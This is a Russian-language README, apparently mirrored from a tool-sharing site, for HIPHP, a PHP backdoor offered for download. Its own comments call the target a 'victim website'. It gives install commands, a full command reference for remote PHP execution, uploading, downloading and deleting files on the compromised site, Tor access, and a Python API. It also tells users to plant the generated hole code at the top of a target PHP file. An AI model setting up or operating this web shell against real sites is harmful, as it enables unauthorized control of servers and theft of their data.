
Инструмент-бэкдор на PHP для удаленного управления сайтом через HTTP/HTTPS. Обеспечивает управление файлами, выполнение команд и подключение через Tor с доступом по паролю.
🚨 Новая сборка доступна!
WebHole теперь поддерживает все основные веб-языки.
Посмотрите на GitHub: WebHole на GitHub
Бесплатный проект с открытым исходным кодом для создания бэкдора для управления сайтами на PHP.
HIPHP BackDoor — это инструмент с открытым исходным кодом, который позволяет удаленно управлять сайтами, использующими язык программирования PHP, через протокол HTTP/HTTPS. Используя метод POST/GET на порту 80, пользователи могут получить доступ к ряду функций, таких как загрузка и редактирование файлов. Кроме того, он предоставляет возможность подключения к сетям Tor, обеспечивая дополнительный уровень безопасности благодаря защите паролем.
Разработанный командой веб-мастеров, которые хотели предоставить больший контроль над своими сайтами без использования стороннего программного обеспечения или услуг, HIPHP — это простое и удобное решение. Поместив HIPHP_HOLE_CODE в любой PHP-файл в структуре каталогов сайта, пользователи получают права доступа для внесения изменений из любой точки мира. Это делает его идеальным решением для владельцев сайтов, ищущих большую гибкость при управлении своим онлайн-присутствием.
Безопасность является главным приоритетом HIPHP: регулярные обновления обеспечивают совместимость с различными версиями кодовой базы PHP, используемыми популярными системами управления контентом (CMS). Функция защиты паролем добавляет дополнительный уровень защиты от несанкционированного доступа. HIPHP — это безопасное решение для тех, кто хочет вернуть полный контроль над своей хостинговой средой.
| Distribution | Version Check | Python Version | Installation | hiphp-cli | hiphp-desktop | hiphp-tk |
|---|---|---|---|---|---|---|
| Ubuntu | Последняя версия | 3.7 --> 3.11 | ✓ | ✓ | ✓ | ✓ |
| Windwos | Последняя версия | 3.7 --> 3.11 | ✗ | ✓ | ✓ | ✓ |
| MacOS | Последняя версия | 3.7 --> 3.10 | ✗ | ✓ | ✓ | ✓ |
| Android-termux | Последняя версия | 3.7 --> 3.9 | ✓ | ✓ | ✗ | ✗ |
| Nethunter | Последняя версия | 3.7 --> 3.9 | ✓ | ✓ | ✓ | ✗ |
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t hiphp:latest
<p>нажмите, чтобы посмотреть <a href="https://asciinema.org/a/QRlMY6JH9uwMCIbaV7F6lLoQ1">Демо</a></p><br>
<br>
<h4>Загрузка, сборка и запуск из Docker Hub:</h4>```bash
# Pull:
❯ docker pull yasserbdj96/hiphp:latest
# Build:
❯ docker build -t docker.io/yasserbdj96/hiphp:latest .
# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t docker.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
нажмите, чтобы посмотреть демо
❯ docker build -t ghcr.io/yasserbdj96/hiphp:latest .
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t ghcr.io/yasserbdj96/hiphp:latest
<p>нажмите, чтобы посмотреть <a href="https://asciinema.org/a/wDWAVo5GURsAbCUVseZsN2PdY">Демо</a></p><br>
<br>
<h2>Установка:</h2>
<h4>Установка пакета Python:</h4>```bash
# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp
# Local install:
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .
# Uninstall:
❯ pip uninstall hiphp
❯ cd hiphp
❯ cd install
❯ bash install.sh --install ❯ hiphp
❯ bash install.sh --update
❯ bash install.sh --uninstall
<br>
<h4>Termux Установка:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# Go to Installation folder:
❯ cd install
# Install:
❯ bash install.sh --termux --install
❯ hiphp
# Update:
❯ bash install.sh --termux --update
# Usage: hiphp [OPTION]
# Examples:
# hiphp --help # Show CLI help for hiphp.
# hiphp --geth [KEY] [URL] # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
# hiphp [KEY] [URL] # Connect to the victim's website in CLI mode.
# hiphp --version # Check the current version number.
# Uninstall:
❯ bash install.sh --termux --uninstall
❯ cd hiphp
❯ bash build_deb.sh
❯ sudo dpkg -i hiphp-.deb
❯ sudo apt install ./hiphp-.deb
<br>
<h2>Запуск без установки:</h2>
<h4>Запуск с помощью hiphp-cli:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# default run on any os:
❯ python main.py --KEY="<KEY*>" --URL="<URL*>"
# Run with Makefile:
❯ make ARGUMENTS="--KEY='<KEY*>' --URL='<URL*>'" run
# For linux:
❯ cd hiphp-linux
❯ bash hiphp-cli.sh --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-cli.bat --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
--help, help # Display this help. --help [ACTIONS], help [ACTIONS] # Help for a specific command. --geth, geth # Get the HIPHP_HOLE_CODE (same purpose as --geth). --phpinfo, phpinfo # Display information about the server. --cls, cls # Clear the console. --exit, exit # Exit the console.
Actions:
--ls, ls # List files and folders (current directory by default). Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH] --ls # List all files and folders in the current directory. --ls [PATH] # List all files and folders in the specified directory. --ls -all # List all files, folders, and subfolders in the current directory. --ls -all [PATH] # List all files, folders, and subfolders in the specified directory.
--cat, cat # Concatenate a file to standard output. Usage: --cat [FILE_PATH]
--set, set # Create a code snippet that is always saved during work. Usage: --set [PHP_CODE] To reset to the initial value, use "--dset" or "dset".
--cd, cd # Change directory. Usage: --cd [PATH]
--rf, rf, run # Run code from a file. Usage: --rf [FILE_PATH] [VARIABLES] --rf [FILE_PATH] # Run code from a file. --rf [FILE_PATH] [VARIABLES] # Run code from a file with variables (e.g., --rf example.php var==hello).
--up, up, upload # Upload a file. Usage: --up [FILE_PATH] [PATH] --up [FILE_PATH] # Upload a file to the current directory. --up [FILE_PATH] [PATH] # Upload a file to a specified directory.
--down, down, download # Download a file. Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH] --down -f [FILE_PATH] # Download a file to the current directory. --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory. --down -d [DIR_PATH] # Download a folder to the current directory. --down -d [DIR_PATH] [OUT_PATH] # Download a folder to a specified directory. --down -all # Download all files to the current directory. --down -all [OUT_PATH] # Download all files to a specified directory.
--zip, zip # Compress a directory. Usage: --zip [DIR_PATH] --zip # Compress the current directory. --zip [DIR_PATH] # Compress a specific directory.
--edt, edt, edit # Edit files. Usage: --edt [FILE_PATH] CTRL+q # Exit the editor. CTRL+s # Save the changes.
--rm, rm, delete # Delete files and folders. Usage: --rm [-f/-d] [FILE/DIR_PATH] --rm -f [FILE_PATH] # Delete a file. --rm -d [DIR_PATH] # Delete a folder.
--mv, mv # Move files and folders. Usage: --mv [SOURCE] [DESTINATION]
--chmod, chmod # change file/folder permissions Usage: --chmod [PERMISSIONS] [FILE/DIR_PATH]
About:
--update, update # Check for updates. --license, license # View the project license. --about, about # About this project. --version, version # Get the current version number.
<br>
<h4>Запустить с помощью hiphp-desktop:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# run with hiphp-desktop tool:
❯ python main.py --DST
# Run with Makefile:
❯ make ARGUMENTS="--DST" run
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Linux:
❯ cd hiphp-linux
❯ bash hiphp-desktop.sh
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-desktop.bat
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
❯ cd hiphp
❯ pip install -r requirements.txt ❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os. ❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
❯ python main.py --TK
❯ make ARGUMENTS="--TK" run
❯ make ARGUMENTS="--TK --KEY='' --URL=''" run
❯ cd hiphp-linux ❯ bash run-hiphp-tk.sh
❯ hiphp-win ❯ run-hiphp-tk.bat
<br>
<h2>Использовать hiphp как скрипт:</h2>
<h4>Использование скрипта:</h4>```python
# install hiphp package:
# ❯ pip install hiphp
# import hiphp package:
from hiphp import *
# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
# PROXIES = To use a proxy.
# RETURN = True for return data as a string, false for print data in the console.
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False, proxies="". #p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser. #p1=hiphp(key="123",url="https://localhost.com/vvv2.php")
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php
p1.run("echo 'this is a test';")
p1.run_file("./examples.php")# Run code from file. p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.
p1.upload("./examples.php")# Upload a file to the current directory. p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.
p1.compress()# Compress the current directory. p1.compress("./example/")# Compress a specific directory.
p1.download("example.zip")# download a specific file to the current directory. p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.
p1.cli() #}END.
<br>
<h2>Скриншоты:</h2>
<div align="center">
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/26eba0a21247c621a1e22d366ed56aef53e66026deb91c0401f2f0600f5e467c.png" alt="Превью hiphp">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f7e873693e43b2997d506931b6263fc03ddb839b685f75510f8c3319eed26136.png" alt="hiphp-cli на Linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/ab8f73643879f0c6257da8f96f75d162525fec87a1d27a757ff1cd92c9f60676.png" alt="справка hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot2.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fcb6cc1affa5fd690891af13697e6354a39292accbb4e9f09c5591e4baec4985.png" alt="hiphp-cli установлен на Linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot3.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/bf9b7f1ec5f8bc9fa33c59b864fed6f497d5b624844aa16f76c4e43af8019ce1.png" alt="hiphp-cli установлен на Termux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot4.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f0e8c087e50616ce47f188195b285d731af64dd79e7da5387bec0077f9346a8f.png" alt="hiphp-cli на Windows">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot14.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/7730738d9028ad2f3c3367bc38b57085946236635df5343308754a86e47b1b31.png" alt="сканирование hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot5.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/44302c3ddc91b76b81e330a05cd87f3271ad2327d63eca6c46bf2eb84759b826.png" alt="вход в hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot6.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/e1a1fb6fa6fd04f49c2ef656d42540e9c633e820e9292dcdeb9154dfbdb7bcfa.png" alt="hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot7.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/c63d4a141ab36bab58a529216ea78828691535c3581c39ed30ffb77ecd51aca6.png" alt="редактор hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot8.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/5883c9001d4cbdcd2dd0df082a4d8cc81fd766456efd548459fc598541222d2c.png" alt="вход в hiphp-desktop тёмная тема">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot9.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/6f1a39895da6033d29e160360c31b1275997c0f180df371b61507bff3ae12dc9.png" alt="hiphp-desktop тёмная тема">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot10.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f578c99a0f94623e73e24f5e15a502bc1a5fd0ebab925fc5f0c9b39a499d28d3.png" alt="редактор hiphp-desktop тёмная тема">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot11.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/29de8b71c3eb0e494749275cc9b641ee411b8c54f20dd71cba165ae587c301b7.png" alt="настройки hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot12.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/cfefaeec60064d87318f897e145b6ba6017de9ef11b558c13b1a3cdc92e995ba.png" alt="вход в hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot13.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fe863889f956edac2ba2f30f0e366a29b0ae8d0f6320548093b40a2cd9690180.png" alt="hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot15.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f75a974cfebdfe6d62a01f72e295061a01c8b296d120be9ce145d07fff01c284.png" alt="hiphp после установки на Linux">
</a>
</div>
<br>
<h2>История изменений:</h2>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/CHANGELOG">Нажмите, чтобы увидеть историю изменений</a>
<br>
<h2>Ограничения:</h2>
1. При первом использовании hiphp на сайте вам будет показан код HIPHP_HOLE_CODE, скопируйте его и загрузите по пути, к которому хотите подключиться, например 'https://localhost/inc/example.php'.<br>
2. Чтобы hiphp работал корректно и без ошибок, HIPHP_HOLE_CODE должен быть размещён в начале целевого файла.<br>
3. hiphp не будет работать и выдаст сообщение о невозможности подключения к сайту, если вы не укажете правильный путь к расположению HIPHP_HOLE_CODE через ссылку.<br>
4. Если вы используете hiphp на сайтах .onion, необходимо запустить службы Tor или браузер Tor.<br>
5. Если вы пользователь Windows, вам необходимо изменить файл "config.ini".<br>
6. Я НЕ НЕСУ ОТВЕТСТВЕННОСТИ ЗА ТО, КАК ВЫ ИСПОЛЬЗУЕТЕ МОИ ИНСТРУМЕНТЫ/ПРОГРАММЫ/ПРОЕКТЫ. БУДЬТЕ ЗАКОННЫМИ И НЕ БУДЬТЕ ГЛУПЫМИ.
<br>
<h2>Разработчик:</h2>
Разработчик / Автор: [yasserbdj96](https://github.com/yasserbdj96)
<br>
<h2>Лицензия:</h2>
<p>Содержимое этого репозитория регулируется следующей <a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/LICENSE">лицензией</a>.</p>
<br>
<h2>Поддержка:</h2>
<p>Если вам нравится этот проект и вы хотите видеть его дальнейшее развитие, или если вы хотите, чтобы я создавал больше интересных проектов, пожалуйста, рассмотрите возможность <a href="https://github.com/sponsors/yasserbdj96">спонсирования меня</a>.</p>
<br>
<br>
<p align="center">
<samp>
<a href="https://yasserbdj96.github.io/">сайт</a> .
<a href="https://github.com/yasserbdj96">github</a> .
<a href="https://gitlab.com/yasserbdj96">gitlab</a> .
<a href="https://www.linkedin.com/in/yasserbdj96">linkedin</a> .
<a href="https://twitter.com/yasserbdj96">twitter</a> .
<a href="https://instagram.com/yasserbdj96">instagram</a> .
<a href="https://www.facebook.com/yasserbdj96">facebook</a> .
<a href="https://www.youtube.com/@yasserbdj96">youtube</a> .
<a href="https://pypi.org/user/yasserbdj96">pypi</a> .
<a href="https://hub.docker.com/u/yasserbdj96">docker</a> .
<a href="https://t.me/yasserbdj96">telegram</a> .
<a href="https://gitter.im/yasserbdj96/yasserbdj96">gitter</a> .
<a href="mailto:[email protected]">эл. почта</a> .
<a href="https://github.com/sponsors/yasserbdj96">спонсорство</a>
</samp>
</p>